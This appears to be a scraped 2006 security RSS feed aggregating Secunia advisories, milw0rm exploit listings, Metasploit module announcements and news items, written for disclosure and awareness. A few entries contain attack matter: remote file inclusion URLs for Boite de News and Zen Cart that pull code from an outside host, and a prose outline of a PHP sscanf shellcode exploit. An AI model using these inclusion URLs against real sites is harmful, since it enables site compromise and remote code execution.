2006-08-18 Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit 2006-08-18 MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2) 2006-08-17 MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) 2006-08-16 MS Windows PNG File IHDR Block Denial of Service Exploit PoC 2006-08-16 VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit 2006-08-13 Nokia Symbian 60 3rd Edition Browser Denial of Service Crash 2006-08-13 Opera 9 IRC Client Remote Denial of Service Exploit (c) 2006-08-13 Opera 9 IRC Client Remote Denial of Service Exploit (py) ]]> http://milw0rm.com/ Fri, 18 Aug 2006 13:58:14 -0400 <br> [ 08/10/2006 ] New exploit module added: netapi_ms06_040<br> [ 08/10/2006 ] New exploit module added: ie_createobject<br> [ 08/10/2006 ] New exploit module added: eiq_license<br> [ 08/10/2006 ] New exploit module added: realvnc_client<br> [ 08/10/2006 ] New exploit module added: securecrt_ssh1<br> [ 08/10/2006 ] New exploit module added: mercury_imap<br> http://www.metasploit.com/projects/Framework/ Fri, 18 Aug 2006 13:57:44 -0400 Release Date: 2006-08-10

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Unpatched

Software: AlsaPlayer 0.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Luigi Auriemma has reported some vulnerabilities in AlsaPlayer, which potentially can be exploited by malicious people to compromise a user's system.

1) A boundary error exists in the "reconnect()" function in reader/http/http.c during the handling of HTTP connections. This can be exploited to cause a stack-based buffer overflow when receiving a specially crafted "Location" HTTP response header.

Successful exploitation may allow execution of arbitrary code, but requires that the client connects to a malicious server.

2) A boundary error in the functions used for adding items to the playlist can be exploited to cause a buffer overflow via e.g. an overly long URL.

Successful exploitation may allow execution of arbitrary code, but requires that the GTK interface is used.

3) Two boundary errors exist in the "cddb_lookup()" function in input/ccda/cdda_engine.c when performing a query to a CDDB server. This can be exploited to cause stack-based buffer overflows when receiving a specially crafted CDDB response.

Successful exploitation may allow execution of arbitrary code when querying a malicious CDDB server.

The vulnerabilities have been reported in version 0.99.76. Other versions may also be affected.

Solution:
Use another product.

Provided and/or discovered by:
Luigi Auriemma

Original Advisory:
http://aluigi.altervista.org/adv/alsapbof-adv.txt
]]> http://secunia.com/advisories/21422/ Fri, 18 Aug 2006 13:54:18 -0400 Release Date: 2006-08-11
Last Update: 2006-08-18

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: SAP Internet Graphics Service (IGS) 6.x
SAP Internet Graphics Service (IGS) 7.x
SAP R/3

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-4133
CVE-2006-4134

Description:
Mariano Nuñez Di Croce has reported two vulnerabilities in SAP Internet Graphics Service (IGS), which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.

1) An unspecified error can be exploited to crash the SAP IGS service via a specially crafted HTTP request.

2) An unspecified boundary error can be exploited to cause a buffer overflow via a specially crafted HTTP request.

Successful exploitation may allow execution of arbitrary code.

Solution:
Apply patches for versions 6.40 and 7.00 (see SAP Note 968423 for details).

Provided and/or discovered by:
Mariano Nuñez Di Croce, Cybsec.

Changelog:
2006-08-18: Added CVE references.

Original Advisory:
http://www.cybsec.com/vuln/CYBSE...IGS_Remote_Denial_of_Service.pdf
http://www.cybsec.com/vuln/CYBSE...P_IGS_Remote_Buffer_Overflow.pdf
]]> http://secunia.com/advisories/21448/ Fri, 18 Aug 2006 13:53:09 -0400 Release Date: 2006-08-15

Critical:
Highly critical
Impact: Privilege escalation
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: SuSE eMail Server 3.x
SUSE Linux 10
SUSE Linux 10.1
SuSE Linux 7.x
SuSE Linux 8.x
SuSE Linux 9.0
SuSE Linux 9.1
SUSE Linux 9.2
SUSE Linux 9.3
SuSE Linux Connectivity Server
SuSE Linux Database Server
SuSE Linux Desktop 1.x
SuSE Linux Enterprise Server 7
SuSE Linux Enterprise Server 8
SUSE Linux Enterprise Server 9
SuSE Linux Firewall on CD/Admin host
SuSE Linux Office Server
SuSE Linux Openexchange Server 4.x
SuSE Linux Standard Server 8

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-1168
CVE-2006-3083
CVE-2006-3084
CVE-2006-3627
CVE-2006-3628
CVE-2006-3629
CVE-2006-3630
CVE-2006-3631
CVE-2006-3632
CVE-2006-3746
CVE-2006-4020

Description:
SUSE has issued an update for multiple packages. These fix some vulnerabilities, which can be exploited by malicious, local users to perform certain actions with escalated privileges, or by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.

For more information:
SA21078
SA21297
SA21402
SA21427

Solution:
Apply updated packages.

Updated packages are available using YaST Online Update or via the SUSE FTP site.

Original Advisory:
http://lists.suse.com/archive/su...rity-announce/2006-Aug/0006.html

Other References:
SA21078:
http://secunia.com/advisories/21078/

SA21297:
http://secunia.com/advisories/21297/

SA21402:
http://secunia.com/advisories/21402/

SA21427:
http://secunia.com/advisories/21427/
]]> http://secunia.com/advisories/21467/ Fri, 18 Aug 2006 13:52:20 -0400 Mambo and Joomla just have way too many vulnerabilities. No more advisories on this http://www.milw0rm.com Fri, 18 Aug 2006 13:51:09 -0400 Release Date: 2006-08-15

Critical:
Moderately critical
Impact: Unknown
Exposure of sensitive information
Where: From remote
Solution Status: Vendor Patch

Software: IBM WebSphere Application Server 6.0.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Some vulnerabilities have been reported in IBM Websphere Application Server, where one has an unknown impact, and others can potentially be exploited by malicious, local users and by malicious people to disclose sensitive information.

1) Certain unspecified information may be exposed.

2) The source code of JSP files may be disclosed.

3) An error exists due to sensitive information being displayed in the ffdc log.

4) An unspecified authority problem exists with ThreadIdentitySupport.

5) Certain user-sensitive information may be exposed in a Trace.

Other issues which may be security related have also been reported.

Solution:
Apply version 6.0.2 Fix Pack 13 (6.0.2.13).
http://www-1.ibm.com/support/docview.wss?rs=180&uid=swg24012915
]]> http://secunia.com/advisories/21487/ Fri, 18 Aug 2006 13:50:27 -0400 Release Date: 2006-08-16
Last Update: 2006-08-17

Critical:
Highly critical
Impact: Manipulation of data
System access
Where: From remote
Solution Status: Vendor Workaround

Software: Zen Cart 1.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
James Bercegay has reported some vulnerabilities in Zen Cart, which can be exploited by malicious people to conduct SQL injection attacks and compromise a vulnerable system.

1) Input passed to the "ipn_get_stored_session", "whos_online_session_recreate", and the "add_cart" functions is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Certain input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.

Examples:
http://[host]/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=[remote file]
* The "typefilter" parameter (only local resources)

The vulnerabilities have been reported in version 1.3.0.2. Other versions may also be affected.

Solution:
Apply code changes as instructed by the vendor.
http://www.zen-cart.com/forum/showthread.php?t=43579

Provided and/or discovered by:
James Bercegay, GulfTech Security Research

Changelog:
2006-08-17: Updated "Solution" section.

Original Advisory:
http://www.gulftech.org/?node=research&article_id=00109-08152006]]> http://secunia.com/advisories/21484/ Fri, 18 Aug 2006 13:49:58 -0400 Release Date: 2006-08-16

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 4
RedHat Linux Advanced Workstation 2.1 for Itanium

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-3627
CVE-2006-3628
CVE-2006-3629
CVE-2006-3630
CVE-2006-3631
CVE-2006-3632

Description:
Red Hat has issued an update for wireshark. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.

For more information:
SA21078

Solution:
Updated packages are available from Red Hat Network.
http://rhn.redhat.com

Original Advisory:
http://rhn.redhat.com/errata/RHSA-2006-0602.html

Other References:
SA21078:
http://secunia.com/advisories/21078/
]]> http://secunia.com/advisories/21488/ Fri, 18 Aug 2006 13:49:05 -0400 Release Date: 2006-08-16

Critical:
Highly critical
Impact: Exposure of system information
Exposure of sensitive information
System access
Where: From remote
Solution Status: Vendor Patch

Software: Sony VAIO Media Integrated Server 3.x
Sony VAIO Media Integrated Server 4.x
Sony VAIO Media Integrated Server 5.x
Sony VAIO Media Platform 2.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Pentest Limited has reported some vulnerabilities in Sony VAIO Media Integrated Server, which can be exploited by malicious people to gain knowledge of sensitive information or compromise a vulnerable system.

1) An unspecified boundary error can be exploited to cause a buffer overflow and execute arbitrary code with SYSTEM privileges.

2) An unspecified input validation error makes it possible to disclose the contents of arbitrary files on the system via directory traversal attacks.

Solution:
Install VAIO Media Integrated Server 4.x/5.x Update Program 1.0.00.42120.

Provided and/or discovered by:
Joe Moore, Pentest Limited.

Original Advisory:
Sony (Europe):
http://kb.sony-europe.com/kb/solutions/en/V00000_V00499/v00246.html

Sony (USA):
http://esupport.sony.com/perl/swu-download.pl?upd_id=2207&SMB=YES

Sony (Japan):
http://vcl.vaio.sony.co.jp/notices/security/info211.html

Sony (Asia):
http://www.css.ap.sony.com/VAIO/...y_notice/SecurityNotice_VMIS.htm

Pentest Limited:
http://www.pentest.co.uk/documents/ptl-2006-02.html
]]> http://secunia.com/advisories/21512/ Fri, 18 Aug 2006 13:48:36 -0400 Release Date: 2006-08-16
Last Update: 2006-08-17

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: PHProjekt 5.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Kacper has discovered some vulnerabilities in PHProjekt, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "path_pre" parameter in lib/specialdays.php and to the "lib_path" parameter in lib/dbman_filter.inc.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.

The vulnerabilities have been confirmed in version 5.1. Other versions may also be affected.

Solution:
Update to version 5.1.1:
http://www.phprojekt.com/download/phprojekt.zip

Provided and/or discovered by:
Kacper

Changelog:
2006-08-17: Updated "Solution" section.
]]> http://secunia.com/advisories/21526/ Fri, 18 Aug 2006 13:47:42 -0400 Release Date: 2006-08-02
Last Update: 2006-08-10

Critical:
Moderately critical
Impact: DoS
System access
Where: From remote
Solution Status: Unpatched

Software: LibTIFF 3.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-3459
CVE-2006-3460
CVE-2006-3461
CVE-2006-3462
CVE-2006-3463
CVE-2006-3464
CVE-2006-3465

Description:
Some vulnerabilities have been reported in libTIFF, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

1) A boundary error in the "TIFFFetchShortPair()" function in tif_dirread.c can be exploited to cause a stack-based overflow via a TIFF image file with a specially crafted "DotRange", "YCbCrSubsampling", "HalftoneHints", or "PageNumber" tag.

2) Boundary errors within the decoders for JPEG, PixarLog, and NeXT RLE streams can be exploited to cause heap-based buffer overflows.

3) An infinite loop in the "EstimateStripByteCounts()" function can be exploited to cause a DoS.

4) Various unchecked arithmetic operations, including range check operations, can be exploited to bypass certain sanity checks.

5) A flaw within the handling of custom tags can lead to abnormal behaviour.

Successful exploitation allows crashing applications linked against libTIFF or execution of arbitrary code.

Solution:
Do not open untrusted TIFF images.

Provided and/or discovered by:
Tavis Ormandy, Google Security Team.

Changelog:
2006-08-10: Added additional details.
]]> http://secunia.com/advisories/21304/ Fri, 18 Aug 2006 13:46:18 -0400 Release Date: 2006-08-17

Critical:
Moderately critical
Impact: Security Bypass
Where: From local network
Solution Status: Vendor Patch

Software: Veritas NetBackup PureDisk Remote Office Edition 6.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
A vulnerability has been reported in Symantec NetBackup PureDisk, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused due to an unspecified error during user authentication in the management interface. This can be exploited to bypass the user authentication and gain elevated privileges on the system.

The vulnerability has been reported in version 6.0 for all platforms.

Solution:
Apply patch (see vendor advisories for details).

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
Symantec:
http://securityresponse.symantec...security/Content/2006.08.16.html
http://seer.entsupport.symantec.com/docs/284734.htm


]]> http://secunia.com/advisories/21507/ Fri, 18 Aug 2006 13:45:20 -0400 Secunia Advisory: SA21528 Print Advisory
Release Date: 2006-08-17

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: IBM Access Support ActiveX Control (eGatherer) 2.x
IBM Access Support ActiveX Control (eGatherer) 3.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
eEye Digital Security has reported a vulnerability in the IBM eGatherer ActiveX control, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error within the RunEgatherer function and can be exploited to cause a stack-based overflow by e.g. tricking a user into visiting a malicious website.

Successful exploitation allows execution of arbitrary code.

Solution:
Update to version 3.20.0284.0.
http://www-307.ibm.com/pc/support/IbmEgath.cab

Provided and/or discovered by:
Andre Derek Protas, eEye Digital Security

Original Advisory:
http://www.eeye.com/html/research/advisories/AD20060816.html


]]> http://secunia.com/advisories/21528/ Fri, 18 Aug 2006 13:44:52 -0400 Please visit the sites below<br><br> http://www.secunia.com<br> http://www.securityfocus.com<br> http://milw0rm.com/<br> http://www.upenn.edu/computing/security Wed, 16 Aug 2006 09:26:29 -0400 #
#
# C Y B E R - W A R R i O R T I M
#
#
####################################################

PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

####################################################

Author: xoron

####################################################

Class : Remote

####################################################

cont@ct: x0r0n[at]hotmail[dot]com

####################################################]]> http://www.milw0rm.com/exploits/2154 Exploits Wed, 09 Aug 2006 11:25:16 -0400 CreW: ToXiC<br><br> Bug Found by Drago84 http://www.milw0rm.com/exploits/2155 Exploits Wed, 09 Aug 2006 11:24:33 -0400 # Boite de News v4.0.1 Remote File Inclusion Vulnerability
#
# Download: ftp://ftp1.comscripts.com/PHP/1801_boiteden-401.zip
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/boitenews4/index.php?url_index=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-09]]]> http://www.milw0rm.com/exploits/2153 Exploits Wed, 09 Aug 2006 11:23:43 -0400 Date: 4-th august 2006
Greets:
Waraxe from www.waraxe.us
All buds at www.plain-text.info
Torufoorum

ext/standard/scanf.c line ~887
---
if (numVars) {
current = args[objIndex++];
---

objIndex points past the end of array in other format cases too

when php-s sscanf-s format argument contains argument swap
and extra arguments are given like.
sscanf('foo ','$1s',$bar) then it reads an pointer to pointer to
zval structure past the end of argument array by one.

This exploit first fills php internally cached memory with address of pointer
to writable segment. Then by unsetting the variable it frees memory, but does not
zero it, so this way we pass our own pointers to sscanf.

Now sscanf allocated array has valid element one past the array,
sscanf tries to call a function to destruct zval structure.
if its 15-th byte isnt anything valid it will default to doing nothing
and will continue without errors and returns;

sscanf now sets the structure to be of type string and writes
pointer to string (it matched from our first argument to sscanf) and strings
length to a structure-s value union. the strings address is written to first 4 bytes
of structure.

knowing this we construct our own binary zval structure of type object. + shellcode + space
to match format. So now we have successfully called sscanf for the first time
and we got something like ptrptr->ptr->zval-of-type-string in memory
zval-of-type-string first 4 bytes point to our object we passed as argument.

so now we fill the internal cached memory with just pointer to zval. and free it.
when sscanf reads the pointer this time it now moves upwards one level but still
dereferences twice. thus acts upon our zval structure of type object.
when the destructor function now sees the zval is an object it will read
a pointer from our structure to another structure which supposed to contain function
pointers. it will call whatever the 2-cond element points to. all elements are 4 bytes long
thus address pointed to by structures offset 4 is called.
when we give it our ptr-to-zval - 4
it will add 4 bytes to it and dereference it an call whatever is there. and
there is address to our constructed zval object so we are executing code
from the beginning of our structure. eip-hop-over will help us through
unwanted bytes and we are on our way executing our shellcode.

*/]]> http://www.milw0rm.com/exploits/2152 Exploits Wed, 09 Aug 2006 11:22:29 -0400 Hitweb 4.2 Remote Include File<br><br> CreW: ToxiC<br><br> Bug Found By Drago84 http://www.milw0rm.com/exploits/2149 Exploits Wed, 09 Aug 2006 09:44:23 -0400 +
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Venedor ...........: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+ http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------]]> http://www.milw0rm.com/exploits/2151 Exploits Wed, 09 Aug 2006 08:59:21 -0400 Release Date: 2006-08-09

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: phNNTP 1.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Tr_ZiNDaN has reported a vulnerability in phNNTP, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "file_newsportal" parameter in article-raw.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been reported in version 1.3. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
Tr_ZiNDaN]]> http://secunia.com/advisories/21407/ PHP Wed, 09 Aug 2006 08:58:35 -0400 Release Date: 2006-08-09

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: docpile:we 0.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Some vulnerabilities have been discovered in docpile:we, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "INIT_PATH" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Affected files:
lib/access.inc.php
lib/auth.inc.php
lib/document.class.php
lib/email.inc.php
lib/folder.class.php
lib/folders.inc.php
lib/init.inc.php (requires PHP5)
lib/templates.inc.php (requires PHP5)

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 0.2.2. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
xoron
]]> http://secunia.com/advisories/21412/ PHP Wed, 09 Aug 2006 08:57:44 -0400 Release Date: 2006-08-09

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Comet WebFileManger 0.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Philipp Niedziela has discovered a vulnerability in Comet WebFileManager, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "Language" parameter in CheckUpload.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.

The vulnerability has been confirmed in version 0.9.1. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
Philipp Niedziela

Original Advisory:
http://www.bb-pcsecurity.de/Webs...guage)_Remote_File_Inclusion.htm


]]> http://secunia.com/advisories/21432/ Exploits Wed, 09 Aug 2006 08:56:13 -0400 Release Date: 2006-08-08
Last Update: 2006-08-09

Critical:
Moderately critical
Impact: Cross Site Scripting
Where: From remote
Solution Status: Vendor Patch

Software: Novell Groupwise 6.x
Novell GroupWise 7.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-3817
CVE-2006-3818

Description:
Some vulnerabilities have been reported in Novell GroupWise, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks.

1) Some errors caused due to the application failing to properly sanitise HTML emails can be exploited to include arbitrary script code in HTML emails, which will be executed in a user's browser session in context of an affected site when the malicious email is viewed.

Examples:
* UTF-7 encoded script tags.
* Some malformed HTML containing script code.

The vulnerabilities have been reported in versions 7 and 6.5. Other versions may also be affected.

2) Certain input passed in the login page is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
The vulnerabilities have been fixed in Hot Patch GroupWise 7 SP2 WebAccess Rev A.

Provided and/or discovered by:
1) Francisco Amato, Infobyte Security Research.
2) The vendor credits Jerome Odegaard.

Changelog:
2006-08-09: Added additional information provided by Francisco Amato. Increased criticality. Added Novell Groupwise 6.x as affected.

Original Advisory:
Novell:
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974242.htm

Infobyte Security Research:
http://www.infobyte.com.ar/adv/ISR-14.html
]]> http://secunia.com/advisories/21411/ Novell Wed, 09 Aug 2006 08:55:47 -0400 phNNTP v1.3 Remote File Inclusion<br><br> CreW: ToxiC<br><br> Bug Found By Drago84<br><br> http://www.milw0rm.com/exploits/2148 Exploits Tue, 08 Aug 2006 11:47:49 -0400 The method of network transport used by the attacker makes this Trojan unique. Typically, keyloggers of this type will send the stolen information back to the attacker via email or HTTP POST, which can appear suspicious. Instead, this Trojan encodes the data with a simple XOR algorithm before placing it into the data section of an ICMP ping packet. http://www.websense.com/securitylabs/alerts/alert.php?AlertID=570 News Tue, 08 Aug 2006 11:45:53 -0400 Security Header


Researchers Warn of Serious BlackBerry Vulnerability
By Matt Hines
August 8, 2006

Be the first to comment on this article


Businesses that use gateway security appliances to protect Research In Motion's BlackBerry communications servers could be subject to attacks based on the planned release of exploit code by a high-profile malware researcher.
ADVERTISEMENT

According to a warning released by network security applications and device provider Secure Computing, organizations with their BlackBerry servers installed behind their gateway intrusion detection boxes could be compromised when researcher Jesse D'Aguanno, a consultant with risk management experts Praetorian Global, of Placerville, Calif., releases his code the week of Aug. 14. D'Aguanno first revealed his vulnerability exploit on Aug. 5 at the Defcon hacker convention in Las Vegas. ]]> http://www.eweek.com/article2/0,1759,2000621,00.asp?kc=EWRSS03129TX1K0000614 News Tue, 08 Aug 2006 11:42:56 -0400 # rewritten because perl is more elegant than php<br> # payload taken from original that ratboy submitted http://www.milw0rm.com/exploits/2147 Exploits Tue, 08 Aug 2006 10:15:32 -0400 ***********************************<br> TiTLE: docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability<br> -<br> Author: xoron<br> -<br> Class : Remote<br> -<br> cont@ct: x0r0n[at]hotmail[dot]com<br> -<br> URL: http://docpile-we.berlios.de http://www.milw0rm.com/exploits/2146 Exploits Tue, 08 Aug 2006 10:14:57 -0400 Date Reported:
July 25, 2006

Vendor:
Microsoft

Description:
A flaw exists in a default Windows component that when exploited allows for remote code execution in SYSTEM context allowing an attacker to take complete control of affected systems.

Severity:
High (Remote Code Execution)

Remote Code Execution:
Yes

Operating Systems Affected:
Windows 2000
[Other operating systems are being researched]

Status:
Initial reporting stage
]]> http://www.eeye.com/html/research/upcoming/20060725.html Misc Tue, 08 Aug 2006 10:13:23 -0400